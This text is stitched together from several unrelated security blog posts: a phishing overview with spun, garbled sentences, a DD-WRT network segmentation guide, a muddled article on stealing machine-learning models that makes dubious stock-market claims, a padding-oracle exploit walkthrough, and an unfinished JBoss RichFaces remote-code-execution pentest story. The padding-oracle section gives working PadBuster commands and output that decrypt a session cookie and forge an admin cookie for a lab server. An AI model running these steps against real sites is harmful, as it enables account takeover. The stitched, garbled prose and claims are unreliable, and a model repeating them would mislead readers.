High Yield Phishing Campaigns using Artificial Intelligence

Artificial intelligence (AI) is a branch of computer science that is primarily concerned with building machines capable of detecting and performing multiple tasks requiring human cognition. For example, these machines are built to perceive dangers around their environment and solutions to it to achieve the company’s goals or organization. Intelligent machines are built in a way that they are capable of imitating the cognitive ability of a human to learn, comprehend, solve, and apply. Artificial intelligence can be utilized in organizations to detect and protect systems of an enterprise from phishing attacks.

Phishing Attacks in Large Corporations

A phishing attack is a process whereby a fraudster is trying to send some scam designed email to a victim to steal some personal information from the victim. The information could be a bank account, pin, password, etc. During the process, the fraudster tries to act like a genuine person from a certain organization or like a reputable person. The following are examples of phishing campaigns commonly used to steal from the organization.

Don't Get Hooked by Spear Phishing Attacks - Big Fish Technology

Spear phishing; this type of phishing that targets a small group or an individual. They try to lure the victim into accessing vital information like bank accounts or the transfer of funds. Firstly, these cybercriminals gather a lot of information concerning the target group before they hit. Sometimes these false emails come from the target coworker who knows how the target group operates. The attackers create malicious websites where they trick the victim into clicking on fake URL and filling in their data. When the cybercriminal has found all the necessary information needed from the victim, he/she then attacks either their bank account or system.

Spear phishing is most common on social media pages like LinkedIn, where cybercriminals can use several data sources to hit a target group.

What's the Difference Between Spear Phishing and Whaling? - Spambrella

CEO Fraud or Whaling; this is a type of spear-phishing attack that mainly targets senior business executives. In this case, attackers try to lure business executives and steal their login information. This type of fraud is done by creating a compromised business email whereby the attackers can authorize the CEO to fraudulent conduct wire transfer to any financial institution. This type of attack happens because the CEO does not involve security awareness training with their junior staff. 

Voice or Voice phishing; this is a phishing campaign where cybercriminals send text messages to the victims trying to get their personal information. These criminals often use fake caller id to make calls appear as they come from the legit organization.

Deceptive phishing; it’s a type of phishing where the attacker disguises to be someone from a legitimate company in an attempt to steal personal and essential information or login credentials. The attackers mostly use emails with threats to manipulate the victim to do what the fraudster wants. A good example is whereby PayPal scammers could send out an attack email to a user instructing him/her to tap on a link to change some information with their account. Without any second thought, the user clicks on a link without knowing it’s a fake PayPal account from the fraudsters trying to steal from him.

Smishing attacks are a type of attack where a fraudster sends a malicious text over the phone to trick the users into clicking on a suspicious link or giving the attackers their personal information. Smithers disguise to be an employee to a particular organization. In February 2019. Nokia Company warned its users to be keen with the smishers masquerading to be Finnish Multinational telecommunications and sending text messages to their clients informing them they have won a car or money. For the car to be delivered, the winner has to send some registration payment for their new car.

Later in the year, a woman succumbed to cancer, who later fell into the hands of smashers. The fraudsters deceived the woman that she has received a federal grant to aid her in her treatment. However, for this federal grant to be credited to the woman, she had to submit down payment and pay taxes on the grant first, the criminal told her.

Pharming phishing; is a type of attack where the fraudsters alter with the data network system by converting the alphabetical website name, e.g., www.amazon.com, to numerical IP addresses. When the website alphabets are changed without the user’s knowledge, it redirects the users to malicious websites of their choice. The website user gets trapped when he attempts to fill in his login credential to the new website, which he is not aware of. Once the domain has been altered with the fraudster, there is nothing that the user can rectify even if he tries to enter the correct site name. 

Phishing Campaigns

Phishing campaigns are important because they provide technology solutions that can help employees and employers during the crisis’s emergence. For example, phishing campaigns educate employers and employees on detecting phishing emails or malicious links from cybercriminals. Furthermore, these campaigns help train employees on how to recognize, avoid, and report any threats that can alter the organization’s data and system. The company should also warn the employee from publishing sensitive personal or corporate information on social media platforms.

To avoid vishing attacks from cybercriminals, users should evade answering calls from unknown people or unknown numbers. And also, users should avoid sharing their personal information with strangers over the phone. When the users implement these simple instructions and procedures, there could be minimum vishing attacks happening.

To fight against CEO fraud or Whaling attacks, the company’s shareholders should ensure that all company personnel participates in security awareness training, including CEOs. Organizations or corporates should implement multi-factor authentication channels into their financial procedures to deter any payment through email. 

The success of deceptive phishing depends on how the fake email resembles the genuine email; thus, all users who have online accounts should be cautious to inspect URLs to check if the links redirect them to malicious webpages. The users should also be very keen to check if there are grammar mistakes, spelling errors that can arise throughout the email.

Before falling into the hands of the smisher, the users should do some research about the unknown number before complying. The users should also call the mentioned company to check whether they are responsible for the actions.

To protect users against pharming attacks, organizations, together with the corporates, should advise employees to log in their credentials to HTTPS sites, which are highly protected, unlike the other sites. Corporates should also establish anti-virus software that is capable of detecting malicious websites. And lastly, companies, together with the organizations, should be in the front line to upgrade their security systems.

What Artificial Intelligence(AI) will look like in 100 years from now? | by  Esha Kothari | Advanced Design for Artificial Intelligence | Medium

Implementation of Artificial Intelligence (AI) To Perform Better Phishing Campaigns

There have been various cybersecurity threats from cybercriminals who try to access the organization’s confidential credentials and business executives. These threats are made by sending fraudulent emails to the recipient by luring him/her to provide vital information or login credentials of the company or his/hers. When the user fails to comply with the attacker’s instructions, they threaten him/her to block their accounts or account of the organization. These fraudsters disguise to be employees of legitimate organizations. For these cybersecurity threats to be minimized and controlled, there is a new technology tool that companies should implement, which is called Artificial Intelligence. This tool is designed to detect any malicious activity, and it can also solve the activity; in other words, the tool has been designed with human cognition. Organizations and corporates can use AI strategy from different perspectives.

Artificial Intelligence can be used to detect systems vulnerability and also any other malicious activities. Traditional systems are outdated and cannot keep up with the sheer number of malware created each month. Regarding this, AI intervene and resolve these issues. 

Machine Learning in Cyber Threats Detection 

Organizations should detect any cyber-attacks before starting to counteract. Machine learning, such as AI, is exceptionally essential in detecting cyber threats from cybercriminals. This machine is capable of analyzing and finding the threat before leveraging a flaw in the information system. AI cognitive can learn and understand the improvements that should be made to evade cybersecurity attacks from fraudsters. In cybersecurity perception, a machine learning tool can detect threats and identify anomalies better than any human being would.

The Future of Authentication: What Will Replace | MEDICI

Artificial Powered Password Protection and Authentication

 The establishment of passwords to a computer and any gadgets have always been a weak solution to control cybersecurity threats. Passwords can be hacked and bypassed by attackers since it’s the only link between cybercriminals and the user. Software developers are using AI to protect computers against cyber threats hence safeguarding the information of the company.

AI and ML in Phishing Detection and Prevention Control

Phishing is the most common attack used by cybercriminals to steal from people. AI and ML play a crucial role in moderating and thwarting phishing threats. AI and ML can detect and respond to any cybersecurity threat faster than a human being. These tools can also detect and monitor any phishing threats around the world. AI can also allow fast distinction between a fake and valid website. By utilizing AI, organizations will rapidly detect probably defend themselves against the most well-known sorts of phishing assaults. That doesn’t mean they will detect every single phish. Phishing is continually developing to embrace new structures and methods. Bearing that in mind, associations must lead security mindfulness preparing on a continuous premise so their workers and chiefs can keep steady over phishing’s development. In the current online protection climate, malicious attackers utilize progressively advanced calculations and expanded strategies, blacklists, rules, and conduct based digital activities. As such, receptive measures are not, at this point, enough. Associations need to rapidly recognize where interruptions happened, the reasonable assault vectors pushing ahead, and how to rapidly remediate misused weaknesses, all in an abbreviated window of reaction time.

A Guide to Do-It-Yourself Network Segmentation

Network segmentation is not only for large corporations – you can segment your home network or small business network securely, and for a reasonable price, too. If you want to ensure the security of your network, network segmentation is a necessity (especially in this era of rampant Internet of Things (IoT) devices co-mingling with more traditional workstations). This way should a security incident occur, you don’t risk entire network compromise – rather, it will only affect an isolated portion of your network.  

This is our (updated) guide to “do-it-yourself network segmentation” where we’ll walk through how network segmentation can be accomplished practically with inexpensive equipment.

The Hardware and Firmware We’ll Be Using

For our example, we’ll be using an ASUS RT-AC3200 as our hardware platform as it gives us relatively modern hardware (Wireless AC and Gigabit Ethernet) for a low price. The default ASUS firmware is pretty capable itself, but we’ll use the DD-WRT firmware since the router supports it, and it will give us an extremely powerful and flexible working environment. Not sure if your router supports DD-WRT? You can find out here.

We won’t cover how to flash the router with DD-WRT, but follow flashing instructions carefully or you may end up with a bricked router. And while we will use DD-WRT in this example, the ideas and concepts presented here are applicable to other platforms. (Some recommended alternatives to DD-WRT you might consider are OpenWrt or Gargoyle Firmware.)

PART 1: PLANNING

To start, you’ll need to design your new network layout. Identify each device and map out what access each device needs. For example, your PC will need to communicate with your smart printer, but you probably want your IoT devices on a separate network altogether. And should you have a temporary visitor, you may want them to access a separate network away from your trusted devices.

NOTE: This is the most important part of the process! Make sure you’ve enumerated all of these requirements before you even begin.

A layout visualizing how three networks will interact


Figure 1
 – A layout visualizing how our three networks will interact with our router and connect to the Internet.

Based on our requirements in the example above, let’s create three wireless networks. We’ll name these according to their intended use: Fox – GeneralFox – Guest, and Fox – Work. The General network will host any personal devices (e.g., Wi-Fi cameras and smart TVs), the Guest network will host visitors’ devices; finally, the Work network will be a dedicated network for work-specific devices (e.g., work-sanctioned laptops).   

Each of these networks will have a different IP subnet for organizational purposes. We’ll keep the wired network on the default subnet 192.168.1.0/24 and use 192.168.2.0/24, and 192.168.3.0/24 for our wireless networks.

PART 2: IMPLEMENTATION

Now it’s time to actually segment our network. Closely follow the steps below to ensure your efforts are successful, and your home or small business network will become that much more secure.

Wireless Networks. In this example, we will be building a network where Fox – General has both 2.4 and 5GHz capabilities; however, the Fox – Guest and Fox – Work networks will be 5GHz specific. If you need both 2.4GHz and 5GHz wireless bands, you’ll need to bridge the wireless networks together or use separate SSIDs for 2.4/5GHz. You might need the 2.4/5GHz capabilities if some of your IoT devices still require 2.4GHz. However, many devices are making the switch to 5GHz.

To kick things off, go to Wireless → Basic Settings in DD-WRT to change the name of the router.

Changing Name and Timezone



After changing the name of the router, go to Wireless → Basic Settings in DD-WRT to set up your wireless networks. We want Fox – General to have both 2.4GHz and 5GHz capabilities. As shown in the GIF below, we are changing all of the SSIDs to Fox – General. Once this is successfully set up, save your settings and apply changes. The below image displays these steps (highlighted).

Creating Fox General



Our next step is to set up the virtual networks for Fox – Guest and Fox – Work. Under Virtual Interfaces, click Add Virtual AP to create two other wireless networks (Guest and Work) and configure them in a similar fashion.

Creating Virtual Interfaces

Now, we need to configure the wireless networks using more or less the same method:

how your screen will look while you configure your networks


Figure 2
 – This is how your screen will look while you configure your networks. Pay attention to the different options.   

Be sure to take a moment to save and apply your changes.

Now that our networks are properly set up, let’s get our security settings in place. Go to Wireless → Wireless Security. Use WPA2-PSK and CCMP-128 (AES).

Setting Up Security



Select a unique, strong WPA Shared Key for both the Fox – General and Fox – Work networks. This password should be randomly generated and not ever guessable. For advice on security best practices regarding passwords, check out this blog post. The Fox – Guest network password should be short, simple, and easy to remember. After all, this is the network password you will be giving out to guests. Note: Fox – General is a bridged network and will show up as two networks. Make sure both of these networks have the same strong password.

After Setup Security


DHCP
 – If we want our devices to be automatically assigned an IP address by the router (a requirement for many IoT devices), we’ll need to ensure we have DHCP set up. To implement DHCP, go to Setup → Networking and look at the DHCPD section. Add a DHCP server for the interfaces of each wireless network we have configured so far (w|0.1, and w|0.2). Again, you’ll want to save changes at this point.

DHCPD



The final step in this tutorial is to reboot the modem and router. If you followed this guide closely, you should find that upon rebooting, your network has been segmented into three wireless networks!

CONCLUSION

This guide is only intended to give you an idea of what’s possible in terms of network segmentation; there are many configurations you could explore such as using VLANs to allow multiple isolated networks to traverse one physical switch. You could also implement strict firewall wall rules using iptables. Or, you could set up logging and monitoring to identify anomalous network activity. These open source firmware images provide some flexibility to set up your network, so get creative and play around with it.

ADDITIONAL RESOURCES

Network Segmentation for Beginners

Equipment We Used for This Tutorial

Segmenting Enterprise Networks  

Orchestrating a Data Heist using Machine Learning

This is a research project I assisted with. Hope you enjoy!

Artificial Intelligence (AI), Machine Learning and Data Science are major buzzwords that have seen a surge in popularity lately. Businesses and governments are increasingly leveraging their applications to “learn” more about their targets i.e. people. The Facebook-Cambridge Data Scandal that came to light in 2018 led to serious conversations about how data had basically become a commodity. Had the masses observed closely, it exposed how they had been “socially engineered” to give up their information.

Social Engineering, paired with AI, could be used to administer lethal attacks on machines which could force it to give any information that it holds. The combination works well because it isn’t strictly a “technical” attack. It involves exploiting the human psyche and using that extracted info with the right technology to launch attacks. To further explain this, think of it in terms of the extremely popular heist movie series called Ocean’s 11. In the film, the crew collects as much information on its targets and uses the right people (resources) to steal the item they intended to.

So, What Exactly is Machine Learning?

“Codifying a strict set of instructions to solve a problem VS Trying to raise a child that will want to do the thing you want it to do — and they will subvert your intentions at every opportunity, trying to shortcut everything to find the simplest through line”

Contrary to popular opinion, Machine learning (ML) is actually a subset of AI. The purpose of Machine Learning is to predict the outcome of a particular data set. So, if one were to input a set of data into a ML algorithm, it can be used to predict the potential outcome values associated with that data set. The application of ML transcends to detecting fraud, evaluating business processes and filtering spam. The applications listed here can only be applied once an ML Model is built around it. These models, once trained, learn from new data pertaining to its application and require a certain level of trust on the developer’s end. The Quote mentioned above is apt in this regard because techniques like ML debugging helps once understand how it actually works. This provides a sense of security to the humans operating it which further helps them understand it.

Machine Learning as a Service

Building upon the idea of an ML Algorithm, ML has seen a renewed interest from businesses. Aimed at solving problems, businesses saw the opportunity to capitalize on ML services to predict the outcomes of their decisions. This further renewed interest among the top “dogs” like Microsoft, Amazon to building their own ML services. The top ML service providers are: –

1. Amazon’s AWS (Amazon Web Services)

2. Microsoft’s Azure

3. IBM’s Watson

4. Google’s Cloud Machine Learning Engine

The question that arises here is How Does it work? Without being too technical, an ML model is trained/developed using an algorithm. This algorithm contains the input data, which forms the basis of the ML model. The input data has to contain the expected outcome (target) and once the model is deployed, the model simulates the patterns that ultimately provides the targeted outcome. Machine Learning as a Service uses Quality prediction API’s and along with a data set, works in a “Black Box” style configuration that continues to engage with the API’s.

Model Stealing Attacks

While these models may seem sophisticated, they are also susceptible to attacks. Fully developed ML models can be exploited and can be used to spit out facts that even its owners couldn’t fathom. An ML model, also referred to as a “Black Box” by its creators, can be compromised by techniques known as “Blackbox queries”. Major applications of this attack pertains to stealing stock market prediction models and for developing a spam filtering model (model to filter mails that classify as spam).
According to prominent cyber security analyst Rhett Greenhagen, there exist models which can be used to steal stock market prediction models. These can be used to influence stock market prices and extract millions of dollars from the companies that developed these models. Greenhagen touched upon the obsession of investors to influence the stock market prices and he provided details of a model built for it.

Raw Data in the hands of a competent ML connoisseur can do inflict more damage than in the hands of a regular stock trader. It can be used to extract patterns and it goes out to show how defenseless these models are to external behavior.

How Is It Done?

To understand how any of this works, it is imperative that one is proficient with the concept of computers and networks and their interaction. With that out of the way, turn your attention back to the stock market stealing model. To execute the model, reconstruction attacks can be administered by probing public/private API’s to simulate a stock market prediction mode. By taking the stock market data of say, the last 15 years would give one an idea of the patterns associated with it. An ML model allows you to create your own rules.

This goes a long way in alerting you whenever a movement takes place in the stock market. So, if the value of a stock changes by a set percentage, the model will alert its creator. The creator can further set an action to take place once the stock changes by that particular percentage. Actions in this context pertain to buying and selling of the stock. So, anyone using this stock market prediction model can invest a relatively smaller amount and walk out with potentially triple the amount in a matter of minutes. The ML model used by the trading houses is basically compromised and “stolen”, without them realizing about it. This model also plays into the psychology of those making the decision to buy and sell because of the limited windows afforded to them while trading. To summarize it in technical terms, you start by gathering your variables (dependent and independent variables). After doing that, you proceed to train the ML model from available data. Once this is done, the ML model can be either published used as per the developer’s convenience.

Another application of this is possible with respect to Google Translate. By understanding the predictive nature of Google Translate, an ML stealing model can be used to source info from these services to develop another service of similar nature. A Tesla is a prime example of this as well, given its heavy reliance on AI.

So, what can you learn from this example?

Data is malleable. It can be manipulated and that blurs the lines between whether one should strictly believe the data presented to them. But in a trading setting, one can’t really be this cautious. The SEC i.e. Security and Exchange Commission has safeguards in place for this exact purpose, which makes it reliable to believe this data.

But think of the implications this attack has on the economy. It negatively affects the economy for as long as these models stay undetected. If this became the trend, it would rob the economy and investors of millions of dollars. Not only that, it also hits out at the Intellectual Property that these trading houses/companies have spent a huge chunk of resources developing. When someone tampers with these models, it also becomes hard to prove these attacks in court, thus destroying the investment made in an instant.

How do you Protect Yourself?

Upon reading this, you might be tempted to build your own model. But there is a good chance that it will miserably backfire on you. The complexity of ML models might throw off an ML model with questionable data, implying that it takes a lot of skill to work with ML models. While it may not affect majority of people, its threat still looms large over them, especially with the rise in Streaming Services. Streaming Services use ML models and given people’s obsession with Netflix and other streaming services; it does make them susceptible to attacks.

Companies have also taken notice of this and have invested a huge chunk of capital into developing competent systems. This is noticeable in the form of extra layers of security, regular pen-testing of their services and influencing its users to follow good security practices. Asking the right questions about technology will help one steer clear of danger.

Adopting an Anomaly Detection Algorithm

Adopting an Anomaly Detection Algorithm is an ideal first line of defense. As the name suggests, it detects anomalies in an ML model as new attacks imply that new anomalies will be created in the model’s life cycle. Its validity has further been proved in the gambling industry.

Develop an Incident Response Process

Once you have detected an anomaly in ML Algorithm the first thing that will tell you how to react is an incident response process. You need to have this in place for your own security. This will tell you how to respond when there is a sudden attack. This is the best strategy to minimize the loss.

Regularly Evaluate safety Models

Revisiting the stock market example, it is not an easy attack to administer. It takes a lot of effort and skill and is often pulled off by corporations. These groups have the motivation and the capital to make it happen. In essence, it is a form of insider trading. These groups reap huge profits off of one stock and with the entire stock market models in their hands, they can wreak havoc on the economy and investors.

Since these models can also be used to steal traditional models developed by companies, companies lose their control over their Intellectual Property. They’ve basically lost ownership of their model and their product and services. Therefore, these companies need to regularly evaluate their models to avoid a loss of such magnitude. An unorthodox idea in this regard might be to work with someone who’s administered such attacks. This will give them insights into the trends of these attacks and will equip them to be prepared for the worst. This conforms with what Rhett Greenhagen stated in his keynote, as he revealed that he worked with the NSA and the CIA.

Final Thoughts

“As far as we know, this type of attack is not being carried out in the real world by malicious parties right now,” says Anish Athalye, a researcher at MIT. “But given all the research in this area, it seems that many machine learning systems are very fragile, and I wouldn’t be surprised if real-world systems are vulnerable to this kind of attack.” The world of AI is a complex one. While it has many applications that can be used for the good of the society, it does have a dark side to it as well. While the average user may not be interested in understanding how AI actually works, they should take an interest. Technology evolves every day and that generates data every second. Claiming ownership to data gives firms like Facebook power as they earn their revenue by selling data to advertisers. These advertisers can do anything with a user’s data and that is a scary thought in itself.

What’s also worth noting here is that the field of AI is also evolving which makes it a double-edged sword. On one side, AI could potentially become the catalyst that helps thwart off malicious activities. The flip side of it is that it could result in more cyber-attacks. Pair it up with an attack like Social engineering, DDoS attacks and that is enough cause for caution. AI certainly won’t go away. Its benefits far outweigh the capital needed to work with it. It’s just a matter of being aware about what’s going on in this field, irrespective of whether someone follows technology or not.

Resources:

https://www.usenix.org/sites/default/files/conference/protected-files/security16_slides_tramer.pdf
https://elie.net/blog/ai/attacks-against-machine-learning-an-overview

Padding Oracle Exploit in ASP.NET

Introduction

The padding oracle attack allows an attacker to decrypt encrypted data without knowledge of the encryption key and used cipher by sending skillfully manipulated ciphertexts to the padding oracle and observing of the results returned by it. This is similar to another blog post I helped out with and can be found here. In this post I’m going to walk though the theory behind this attack and how to perform it if you find it in the wild. This issue keeps popping up in the wild so I figured I would show to to pull off this type of attack. Lets get started!

Cipher Block Chaining (CBC)

CBC is an encryption mode in which the message is split into blocks of X bytes length and each block is XORed with the previous encrypted block. The result is then encrypted.

The following schema (source: Wikipedia) explains this method:

During the decryption, the reverse operation is used. The encrypted data is split in block of X bytes. Then the block is decrypted and XORed with the previous encrypted block to get the cleartext. The following schema (source: Wikipedia) highlights this behavior:

Since the first block does not have a previous block, an initialization vector (IV) is used.

Theory

Credit to PentesterLabs, They give an amazing explanation on the theory behind this attack:
When an application decrypts encrypted data, it will first decrypt the data; then it will remove the padding. During the cleanup of the padding, if an invalid padding triggers a detectable behavior, you have a padding oracle. The detectable behavior can be an error, a lack of results, or a slower response. If you can detect this behavior, you can decrypt the encrypted data and even re-encrypt the cleartext of your choice.

If we zoom in, we can see that the cleartext byte C15 is just a XOR between the encrypted byte E7 from the previous block, and byte I15 which came out of the block decryption step:

This is also valid for all other bytes:

Now if we modify E7 and keep changing its value, we will keep getting an invalid padding. Since we need C15 to be \x01. However, there is one value of E7 that will give us a valid padding. Let’s call it E’7. With E’7, we get a valid padding.

Since we know we get a valid padding we know that C’15 (as in C15 for E’7) is \x01.

Now that we have C15, we can move to brute-forcing C14. First we need to compute another E7 (let’s call it E”7) that gives us C15 = \x02. We need to do that since we want the padding to be \x02\x02 now. It’s really simple to compute using the property above and by replacing the value of C15 we want (\x02) and I15 we now know:

Using this method, we can keep going until we get all the ciphertext decrypted

Performing The Exploit

Okay, some of you probably just skipped to this part because lets be honest, you didn’t come here to learn a bunch of theory behind cryptology so Ill get right to it. To demonstration this vulnerability, I setup a web application lab on my home server provided by PentesterLabs(DM and Ill send you the zip). I then registered an account on the web server and attempted to login with the credentials: MattKeeley:MattsSecretPassword

POST /login.php
HTTP/1.1 Host: 192.168.134.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.134.129/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Connection: close
Upgrade-Insecure-Requests: 1



 username=MattKeeley&password=MattsSecretPassword
HTTP/1.1 302 Found
Date: Fri, 24 Jul 2020 12:25:42 GMT
Server: Apache/2.2.21 (Unix) DAV/2 PHP/5.4.3
X-Powered-By: PHP/5.4.3
Set-Cookie: auth=ajjpZSp0uZxPVZRp33L2YfC8tMnXvR94
Location: /index.php
Content-Length: 778
Connection: close
Content-Type: text/html

…omitted for brevity…

There is a tool built into Kali Linux called PadBuster that we are going to use to decrypt the encryption. The following command is used to generate response signatures:

root@warmachine:~# padbuster http://URL/login.php ajjpZSp0uZxPVZRp33L2YfC8tMnXvR94 8 --cookies auth=ajjpZSp0uZxPVZRp33L2YfC8tMnXvR94 --encoding 0
+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+



INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 1530

INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***

INFO: No error string was provided…starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

ID# Freq Status Length Location
1 1 200 1677 N/A
2 ** 255 200 15 N/A
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2
[+] Success: (18/256) [Byte 8]
[+] Success: (34/256) [Byte 7]
[+] Success: (253/256) [Byte 6]
[+] Success: (237/256) [Byte 5]
[+] Success: (238/256) [Byte 4]
[+] Success: (118/256) [Byte 3]
[+] Success: (180/256) [Byte 2]
[+] Success: (233/256) [Byte 1]

Block 1 Results:
[+] Cipher Text (HEX): 4f559469df72f661
[+] Intermediate Bytes (HEX): 1f4b8c171700dcef
[+] Plain Text: user=tes

Use of uninitialized value $plainTextBytes in concatenation (.) or string at /usr/bin/padbuster line 361, line 1.
*** Starting Block 2 of 2 ***
[+] Success: (153/256) [Byte 8]
[+] Success: (13/256) [Byte 7]
[+] Success: (138/256) [Byte 6]
[+] Success: (36/256) [Byte 5]
[+] Success: (149/256) [Byte 4]
[+] Success: (107/256) [Byte 3]
[+] Success: (171/256) [Byte 2]
[+] Success: (205/256) [Byte 1]

Block 2 Results:
[+] Cipher Text (HEX): f0bcb4c9d7bd1f78
[+] Intermediate Bytes (HEX): 3b52936ed875f166
[+] Plain Text: t
** Finished ***


[+] Decrypted value (ASCII): user=test
[+] Decrypted value (HEX): 757365723D7465737407070707070707
[+] Decrypted value (Base64): dXNlcj10ZXN0BwcHBwcHBw==

Now that we have our proof of concept for this vulnerability, we can take this a step further and create a cookie for any username of our choice. For this example, the goal is to create a auth token for the admin user and login. To do this we will run PadBuster again but add a slight modification to the payload:

root@warmachine:~# padbuster http://URL/login.php ajjpZSp0uZxPVZRp33L2YfC8tMnXvR94 8 --cookies auth=ajjpZSp0uZxPVZRp33L2YfC8tMnXvR94 --encoding 0 --plaintext user=admin
+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+
…omitted for brevity…

** Finished ***
[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA

Now that we have this auth token, we can use it to login to the admin account!!

GET /index.php HTTP/1.1
Host: 192.168.134.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,<em>/</em>;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://burp/
Cookie: auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
Connection: close
Upgrade-Insecure-Requests: 1
RESPONSE
HTTP/1.1 200 OK
Date: Fri, 24 Jul 2020 12:44:15 GMT
Server: Apache/2.2.21 (Unix) DAV/2 PHP/5.4.3
X-Powered-By: PHP/5.4.3
Content-Length: 1187
Connection: close
Content-Type: text/html

…omitted for brevity…

You are currently logged in as admin!

Is this found in the wild?

Well duh! In the past 3 months I have found this issue twice within some pretty big companies environments. That being said, this vulnerability is still very relevant today! If you’re interested in some writeups that were recently(last 3 years) posed on Hackerone you can find them here and here. Writing this code correctly is very hard, even for experts. For example, in one instance experts have introduced a severe form of this vulnerability while attempting to patch the code to eliminate it.

It is also pretty difficult to identify these vulnerabilities since a lot of times you can only see them under close observation under specific conditions.

How do I fix this issue?

The easiest and best response to this question, DONT USE CBC! There are plenty of alternatives that use the same block sizes and will not mess up your code.

JBoss Richfaces 3.X RCE

Context

While on an engagement for ASU, I ran into a newly built web application that was running Red Hat JBoss. For those of you who don’t know what JBoss is, it is an Application platform that “delivers enterprise-grade security, performance, and scalability in any environment”. Another thing to note before reading this post is that RichFaces, a JBoss component, is an “advanced UI component framework for easily integrating Ajax capabilities into business applications using JSF”. Now that’s all said and done, lets get on with how to RCE this sucker.

While reviewing this web application for security problems, there were a few systemic issues I noticed. The server itself was very slow and buggy. The overall security of the application had little to no “low-hanging fruit”. This is pretty standard for web applications that have a bug bounty program. However, this application in particular was very outdated and contained various xHTML functions that I found while crawling the application.

Methodology

Some shit here about methodolies and my approach to pentesting this app.
Some things to keep in mind:
The application was using the JBoss(Java) Seam framework and was a HEAVY state based application. So what does this even mean? There are basically two opportunities to win on an application like this…
Find a way to exploit the Seam framework || Find a Java deserialization bug

Research

There’s a problem with older technology. Back when the tech was built, they didn’t have security in mind. This is especially true when it comes to government IT systems such as mainframes. Never the less, old technology breaks, you just have to find where the weak spots are. After doing extensive research on the Java Seam framework and how it works with web applications, I found a few interesting things:
1. The last stable release for the Java Seam framework was in January 2012.
2. Richfaces is a huge dependency and a LOT of applications still use it.
3. Typlically, upon CVE submission if the CVE is less than a 9.5, a new CVE will not be accepted for software past end of life of 5+ years

Figure 1 – Image of similar Java based application

There’s an old saying in security, check the source!

This looked to me like a Java object????

So I read some interesting things about how RichFaces has been exploited before using this method. However, the source was a sketchy Chinese website. I attempted to decipher the this article to build the exploit. After trying to get everything to work, I got REKT! Most of the library Jar dependencies were out of date and do not work anymore. But at least the code compiles?

Putting it all together

The sketch Chinese website led me to a Github page that was in English didn’t have very good instructions. So the only thing left to do is was OSINT for the missing and broken dependencies and find some old stuff. I decided to waste another 5 hours of my life by searching for this. I finally came across a JBoss El API page that has the same methods needed for this exploit.

After finding everything I needed from the right dependencies to the right version of Eclipse to build the application, I finally got everything working. Or so I thought….

The steps were simple,

Create a new Java Web Project in Eclipse.
Extract dependencies in Jar format to the lib folder.
Read Chinese from sketch website to get the Main.java class.
Create payload and compile

After everything compiled and executed correctly I had the final Java Object that I needed to exploit this beast. So I tried running a simple command to create a file called WinnaWinna in the root directory and executed it .

Andddddd broken. Turns out I just cant spell and missed a needed paramater in the URL. Go figure. So for my final attempt as if this is a Magic Show and the magician just sucks, this was my final GET request:

WinnWinna was created in the root directory. For the screenshot purposes of this write-up, I used the tmp dir (I know someone was gonna say shit about that so I had to say it)

For all of you wondering if I got the 1337 /etc/passwd file :